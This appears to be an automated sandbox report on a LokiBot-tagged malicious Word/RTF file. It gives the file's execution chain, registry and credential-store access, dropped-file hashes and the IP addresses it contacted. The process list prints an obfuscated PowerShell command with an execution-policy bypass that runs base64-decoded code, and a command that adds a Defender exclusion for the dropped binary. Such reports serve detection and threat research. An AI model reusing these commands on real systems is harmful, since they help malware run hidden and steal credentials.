Malware Analysis Report

2025-04-03 09:50

Sample ID 241120-l7qt3svpgv
Target seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc
SHA256 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
Tags lokibot collection defense_evasion discovery execution spyware stealer trojan
Score 10/10

Analysis Overview

Score 10/10

SHA256 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1

Threat Level: Known bad

The file seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Lokibot family

Lokibot

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

outlook_office_path

Launches Equation Editor

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-11-20 10:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-11-20 10:10

Reported 2024-11-20 10:13

Platform win7-20241010-en

Max time kernel 102s

Max time network 106s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2700 set thread context of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2824 wrote to memory of 2880 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Windows\SysWOW64\mshta.exe
PID 2824 wrote to memory of 2880 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Windows\SysWOW64\mshta.exe
PID 2824 wrote to memory of 2880 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Windows\SysWOW64\mshta.exe
PID 2824 wrote to memory of 2880 | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Windows\SysWOW64\mshta.exe
PID 2880 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2880 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2880 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2880 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2500 wrote to memory of 1056 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1056 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1056 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1056 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 2184 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2500 wrote to memory of 2184 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2500 wrote to memory of 2184 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2500 wrote to memory of 2184 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2184 wrote to memory of 2364 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2184 wrote to memory of 2364 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2184 wrote to memory of 2364 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2184 wrote to memory of 2364 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2500 wrote to memory of 2700 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2500 wrote to memory of 2700 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2500 wrote to memory of 2700 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2500 wrote to memory of 2700 | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 1680 wrote to memory of 2356 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2356 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2356 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2356 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 2700 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1420 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1420 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1420 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1420 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"

C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe

"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'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'+[CHAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

Network

Country | Destination | Domain | Proto
US | 66.63.187.231:80 | 66.63.187.231 | tcp
US | 66.63.187.231:80 | 66.63.187.231 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp

Files

memory/1680-0-0x000000002F271000-0x000000002F272000-memory.dmp

memory/1680-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/1680-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta

MD5 ec0d423a3f72d69975a1e31a275f5377
SHA1 213922fb8456ecaadc24889afec1ac6ef5010c68
SHA256 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA512 8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c04f3c41985cc013413eaf2ceecf6a56
SHA1 ccfb117f414652e7d86e4fa5621e963780007e2e
SHA256 ee56fedc94cd68206a7f3bdb6b79f94f330526a5619325692cd56efcb859ea46
SHA512 71c79fa4f6c7ccb829c44c6a504be4922ac7eed6cbbf06ad99a072f3ad60df687f918c3837b13775b0348fbae0006694ed88bf246fb7a10895614c2018491623

\??\c:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline

MD5 c92670f3725404e64b76b8d9980423fc
SHA1 5d13b67ece4a024ab25fb99b91c22606c1a7e19d
SHA256 377d8c2b51a5cb5db8089cb24d224dbbeb8c5948d489ecd216f4735b40156c29
SHA512 5f4989b0e1280eefcb58a10a83fd009cedde8b91d0d98e47f28f53b0bf0475e567544736a8f65cdfebb1b643bfeba938781539fd37226488c8b2748b4c01b072

\??\c:\Users\Admin\AppData\Local\Temp\klunhxwy.0.cs

MD5 b0517586f4097114e790c61f2685f0d5
SHA1 20f7482298ab96731228ebd5242ceddfd72ff50f
SHA256 a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512 c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

\??\c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp

MD5 999c87e859de2b9b8b054d93932f84ac
SHA1 2271f2cd0b04f2c4c939246e09c73f6464e4d571
SHA256 b6c08100f15e6f8599dc10f196b3fd2d1dee3d6e6cf79f6d18f26097e1f1e8a3
SHA512 d0f88c16fc5100440eff04be383fceb1c3118288275022e35a0cb8058898cdc56b0751aa571374ea2054c03af63a73d8fb4fb70406675023c300760ef8cead2e

C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp

MD5 89305fdda65d73947f803c5d5d091a4f
SHA1 482b23036f9eb4e66406aaeb180f4945df9878d9
SHA256 ded8bef05d8c334bd02025f80341eabd6412c416bd1870d70376e2e1697378dc
SHA512 55b17c46355203dd6668462bf0107a86316639ababe8c0823dba116982ac2cb76051ebf6bd97229be81c1ef30c599c0f1289d00d444f24d1dcf1bdb943f27308

C:\Users\Admin\AppData\Local\Temp\klunhxwy.dll

MD5 2199d8595aaf1be3e737f6802a96e1bc
SHA1 2e35254a31b08f01a6387b58fc1da40f32db4672
SHA256 966a05290311a4663d1fd0f1c133f2b0d85ba86a3f2cf4b2223658e50968febf
SHA512 c1077ca4743c2978ce33051d5edee78563c72e1444f59353d3208edc3ef635ffa1369d040e630b91baa7fe4350ca33bec6ee551a7314ff283a789561144107f6

C:\Users\Admin\AppData\Local\Temp\klunhxwy.pdb

MD5 85abcf4e5bbbc4c60ddd892a8362f94d
SHA1 dd80d4f21e9ae6177369d12aa2166c279fdd3c76
SHA256 95cd0f5128a760c6b211966bfd4cce1ccdb8e6c22cfb663deb81ba89c3f291cf
SHA512 ebd6fd66355b0e1afb20f6f4c8f5ac88a082febdbc822c35817811bfbed23ce93a82b93c99e26cd2f9e605e7878332b7e8d0bd74c807e9a25d87de7d50bde9f9

\Users\Admin\AppData\Roaming\wininit.exe

MD5 66b03d1aff27d81e62b53fc108806211
SHA1 2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

memory/1680-51-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/2700-52-0x0000000000100000-0x0000000000198000-memory.dmp

memory/2700-53-0x00000000003A0000-0x00000000003B2000-memory.dmp

memory/2700-54-0x0000000005150000-0x00000000051B4000-memory.dmp

memory/1984-56-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-69-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-67-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-66-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1984-64-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-62-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-60-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-58-0x0000000000400000-0x00000000004A2000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/1984-94-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-103-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2024-11-20 10:10

Reported 2024-11-20 10:13

Platform win10v2004-20241007-en

Max time kernel 133s

Max time network 142s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf" /o ""

Signatures

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf" /o ""

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 52.242.123.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp
GB | 2.16.76.107:443 | metadata.templates.cdn.office.net | tcp
US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
